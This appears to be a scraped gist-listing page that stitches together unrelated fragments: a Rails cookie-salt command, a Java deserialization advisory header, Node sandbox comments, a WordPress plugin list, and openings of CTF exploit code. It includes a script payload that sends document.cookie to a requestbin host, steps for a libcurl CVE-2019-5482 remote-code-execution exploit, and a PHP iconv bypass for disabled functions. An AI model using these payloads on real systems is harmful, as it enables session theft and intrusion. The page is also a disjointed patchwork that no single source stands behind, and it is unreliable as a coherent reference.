$ rails runner 'Rails.application.config.action_dispatch.tap { |c| p encrypted_cookie_salt: c.encrypted_cookie_salt, encrypted_signed_cookie_salt: c.encrypted_signed_cookie_salt }'
Chris Frohoff – Qualcomm Information Security and Risk Management
- Affected Product(s): Java SE 6, Java SE 7
- Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
- Vendor Contact: secalert_us@oracle.com
- Vulnerability Type: Unsafe Object Deserialization
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//////// | |
// The vm module lets you run a string containing javascript code 'in | |
// a sandbox', where you specify a context of global variables that | |
// exist for the duration of its execution. This works more or less | |
// well, and if you're in control of the code that's running, and you | |
// have a reasonable protocol in mind// for how it expects a certain | |
// context to exist and interacts with it --- like, maybe a plug-in | |
// API for a program, with some endpoints defined for it that do | |
// useful domain-specific things --- your life can go smoothly. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script> | |
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';"> |
- Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
- Update ip addresses at the source files
- Launch
srv.py
on the server - Upload
sol.php
via curl:curl http://$URL:$PORT/ -d 'rce@sol.php'
This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/
Credits: @hugeh0ge
It uses iconv
, in php, in order to execute the same payload.
Uses cases :
- You control the first parameter of
iconv
(in_charset), you can set an env var and you can upload arbitrary files (.so
library file and thegconv-modules
file) and you know their path. - You have a php RCE but
system
,shell_exec
,curl_exec
and other functions are disabled but you cansetenv
(andLD_PRELOAD
is blacklisted).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
10web-manager | |
4k-icon-fonts-for-visual-composer | |
accelerated-mobile-pages | |
accept-payments-wp | |
accu-auto-backup | |
ace-edit | |
ace-editor-for-wp | |
aceide | |
acelerator | |
acf-code-field |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# elisp, lua, python2, and jvm | |
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/ | |
$flag = File.read('flag').chomp | |
$ml_preamble = nil | |
$lua_preamble = nil | |
$ruby_preamble = nil |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
gcc -m64 -nostdlib -Os -mrtm -fno-toplevel-reorder -static -Wno-multichar solve.c -o solve.elf | |
objcopy -Obinary -j .text solve.elf solve.bin | |
Reference https://github.com/Alberts-Coffee-Hours/Mastik/blob/master/src/l1.c, | |
https://github.com/vusec/ridl/blob/master/exploits/shadow/leak.c | |
and https://github.com/oranav/ctf-writeups/blob/master/gctf19/RIDL/solve.c | |
*/ | |
#include <stdio.h> | |
#include <stdlib.h> |
OlderNewer